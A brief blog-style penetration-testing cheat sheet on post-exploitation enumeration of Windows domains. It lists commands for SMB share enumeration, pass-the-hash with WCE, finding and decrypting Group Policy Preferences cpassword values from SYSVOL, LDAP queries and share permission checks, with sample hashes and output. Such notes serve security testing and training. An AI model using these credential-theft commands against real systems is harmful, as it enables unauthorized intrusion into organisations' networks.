Windows Enumeration - Post Exploitation



nmap --script smb-enum-shares.nse -p445 IP
 
 
enum4linux
 
 

Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted:
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f

C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml \\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/> 

C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs 1q2w3e4r5t
 

=============================================================================

LDAP ports open TCP 389

ldapsearch -x -h host_or_domain.local -s base namingcontexts


Tells you the permissions of files in Windows on the domain.

smbcacls -N '//IP_or_HOSTNAME/share' /Users







No comments:

Post a Comment